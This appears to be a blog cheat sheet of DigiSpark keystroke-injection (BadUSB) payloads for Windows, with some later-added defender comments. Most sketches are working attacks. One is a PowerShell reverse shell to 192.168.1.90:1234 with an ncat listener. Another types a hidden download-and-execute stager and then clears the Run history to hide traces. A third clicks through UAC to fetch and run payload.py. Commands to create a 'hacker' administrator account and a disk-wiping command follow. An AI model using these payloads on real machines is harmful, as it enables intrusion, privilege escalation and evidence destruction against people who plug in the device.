
Payloads digispark

Ludovic COULON
April 12th, 2020 · 1 min read

Payloads generator for Windows/Linux/Mac

Duck ToolKit

CedArctic/DigiSpark-Scripts

Introduction

thewhiteh4t/flashsploit

Convert DuckyScripts > Digispark

Duckuino

All the payloads that just work 👍

Say something on command line

Say something from the command-line interface 🎭

#include "DigiKeyboard.h" // DigiSpark keyboard-emulation library; provides the DigiKeyboard object and KEY_*/MOD_* constants used below
// Keystroke-injection demo: the board types a short PowerShell session that
// loads System.Speech and speaks one sentence, then closes the console.
// Every statement is a keystroke or a pause; order and delay values are the
// whole logic, so nothing here is reusable as a helper. Runs once at power-up.
//
// Defender note: to the host this looks like a newly attached keyboard that
// immediately opens Run (Win+R) and launches powershell.exe. USB device
// control and process-creation logging on powershell.exe are the natural
// control points; the typed text itself is visible in script-block logs.
void setup() {
  DigiKeyboard.sendKeyStroke(0);   // empty report first — presumably lets the host finish enumerating the device before real keys arrive; verify against the library
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(100);
  DigiKeyboard.print("powershell");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(3000);        // give the console time to appear; if this is too short the next lines land in the wrong window
  DigiKeyboard.print("Add-Type -AssemblyName System.speech"); // load the speech-synthesis assembly
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(100);
  DigiKeyboard.print("$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(100);
  DigiKeyboard.print("$speak.Speak(\"hello from digispark.\")"); // the sentence that is spoken
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(100);
  DigiKeyboard.print("exit");      // close the PowerShell session
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(100);
  // Alt+Space opens the window's system menu; N presumably picks "Minimize"
  // on an English UI — the accelerator is locale-dependent, so confirm on the target locale.
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT);
  DigiKeyboard.sendKeyStroke(KEY_N);
}
25
// Intentionally empty: the whole sequence runs once in setup(); afterwards the board idles.
void loop() {
}

Create administrator account Reverse shell windows

Reverse shell on windows

First, on the attacker's host machine, start a PHP server and upload the payload

# Start the php server
# NOTE(review): -S 0.0.0.0:80 binds every interface and -t serves the entire
# Desktop directory, so everything in that folder is readable by anyone who
# can reach this host while the server runs.
sudo php -S 0.0.0.0:80 -t /Users/zeeph/Desktop/
# Create a file called payload.ps1
# Two variants of the same interactive reverse shell: open a TCP connection to
# 192.168.1.90:1234, read whatever the listener sends, evaluate it with iex,
# and write the output back over the socket until Read() returns 0. The first
# variant also appends a "PS <cwd>> " prompt and captures errors via Out-String.
#
# Defender note: the observable pattern is powershell.exe opening an outbound
# TCP connection to a non-web port, with script-block logs showing TCPClient
# plus iex on data received from the network; outbound filtering and
# script-block logging make this visible regardless of the hidden window.
$client=New-Object System.Net.Sockets.TCPClient('192.168.1.90',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# Shorter variant: same loop, no prompt and no Out-String, and the client is never explicitly closed.
$sm=(New-Object Net.Sockets.TCPClient('192.168.1.90',1234)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
# Listen for all TCP connections on port 1234
# ([PORT] is a placeholder; the payload above connects to 1234, so the two must match)
ncat -nvlp [PORT]

# Shell spawner, Linux only! (uses the pty module to get a proper terminal)
python -c 'import pty; pty.spawn("/bin/sh")'
#include "DigiKeyboard.h" // DigiSpark keyboard-emulation library; provides the DigiKeyboard object and KEY_*/MOD_* constants used below
2
// Download-and-execute stager typed over keystroke injection. After the
// keyboard settles it opens Run (Win+R) and launches a hidden PowerShell that
// fetches http://192.168.1.90/payload.ps1 and runs it with IEX, then opens
// Run a second time and deletes the Run-dialog history (RunMRU) so the typed
// command line is not left in the registry.
//
// Defender notes:
//  - "-windowstyle hidden -nop" plus IEX(DownloadString(...)) typed into Run
//    is recorded by PowerShell script-block logging and process-creation
//    logging even though no window is shown.
//  - Emptying HKCU\...\Explorer\RunMRU is an anti-forensic step and itself an
//    indicator: RunMRU values vanishing right after a powershell.exe launch
//    is worth alerting on.
//  - USB device allow-listing, PowerShell application control and egress
//    filtering toward unknown hosts each break this chain at a different point.
void setup() {
  DigiKeyboard.update();           // flush pending HID state before typing
  DigiKeyboard.sendKeyStroke(0);   // empty report — presumably completes enumeration before real keys; verify against the library
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(200);
  // println (unlike print above) presumably ends the line with Enter, so the
  // Run dialog executes this immediately.
  DigiKeyboard.println("powershell -windowstyle hidden -nop \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.90/payload.ps1');\"");
  DigiKeyboard.delay(1500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R again for the cleanup command
  DigiKeyboard.delay(200);
  // Deletes every value (-Name '*') under the Run dialog's MRU list;
  // -ErrorAction SilentlyContinue hides any failure from the user.
  DigiKeyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
}
15
// Intentionally empty: the whole sequence runs once in setup(); afterwards the board idles.
void loop() {
}

Python script with digispark ⚆

#include "DigiKeyboard.h" // DigiSpark keyboard-emulation library; provides the DigiKeyboard object and KEY_*/MOD_* constants used below
// Elevated download-and-run of a Python script via keystroke injection.
// Sequence: wait 5 s, Win+R, type "powershell -windowstyle hidden", then
// Ctrl+Shift+Enter — in the Run dialog this requests an elevated launch,
// which on a default configuration raises a UAC consent prompt; Left-arrow
// then Enter is presumably meant to select "Yes" on that prompt (layout- and
// locale-dependent, not verifiable from here). The hidden PowerShell then
// downloads http://192.168.1.90/payload.py with Invoke-WebRequest and runs it
// with python. Pin 1 is held HIGH for 90 s while that runs, then set LOW.
//
// Defender notes: the UAC prompt is the pivotal step — a blind keystroke
// sequence can only press a button, so configuring UAC to prompt for
// credentials rather than consent stops this path. On the host, an elevated
// hidden powershell.exe performing a web download and then spawning
// python.exe is the event sequence to alert on.
void setup() {
  DigiKeyboard.delay(5000);        // initial settle time before any keys are sent
  DigiKeyboard.sendKeyStroke(0);   // empty report — presumably completes enumeration; verify against the library
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(300);
  DigiKeyboard.print("powershell -windowstyle hidden");
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT); // Ctrl+Shift+Enter: elevated launch request
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // move focus on the UAC dialog (presumably onto "Yes")
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);        // wait for the elevated console to appear
  DigiKeyboard.print("$source = \"http://192.168.1.90/payload.py\"; $destination = \"C:/Documents\"; Invoke-WebRequest $source -OutFile $destination;");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(5000);        // allow the download to finish
  DigiKeyboard.print("python C:/Documents/payload.py");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(1, HIGH);           // status indicator on pin 1 — no pinMode(1, OUTPUT) in this sketch, so actual LED behaviour depends on board defaults; TODO confirm
  DigiKeyboard.delay(90000);       // keep the indicator on for 90 s while the script runs
  digitalWrite(1, LOW);
  DigiKeyboard.delay(5000);
}
// Intentionally empty: the whole sequence runs once in setup(); afterwards the board idles.
void loop() {
}

Useful commands

Windows commands

CMD - Windows commands

The equivalent of the Linux command separator `;`, as in

1echo "command 1" ; echo "command 2"

is

1dir & whoami

Dealing with files and stuff

Delete file

1del

Create folder/directory

1md folderName

Show hidden files

1dir /A

Print out file content, like cat

1type file.txt

Search in files (grep equivalent)

1findstr file.txt

Network

Show network information

1netstat -an

Show network adapter info

1ipconfig

Ping another machine

1ping 192.168.1.101

Traceroute

1tracert

Processes

List processes

1tasklist

Kill a process

1taskkill /PID 1532 /F

Users

# List local accounts
net users

# Add user
# Creates a local account and then adds it to the administrators group.
# Defender note: both steps are audited — Security event 4720 (account
# created) and 4732 (member added to a local group). A new local admin
# appearing outside change management is a high-signal alert.
net user hacker my_password /add
net localgroup Administrator hacker /add

# Check if you are part of a domain
net localgroup /domain

# List all users in a domain
net users /domain

Other

Shutdown

# Shutdown now (/s = shut down, /t 0 = no countdown)
shutdown /s /t 0

# Restart (/r = reboot, /t 0 = no countdown)
shutdown /r /t 0

ciper - Clear data/shred

1Shreds the whole machine
2ciper /w:C:\
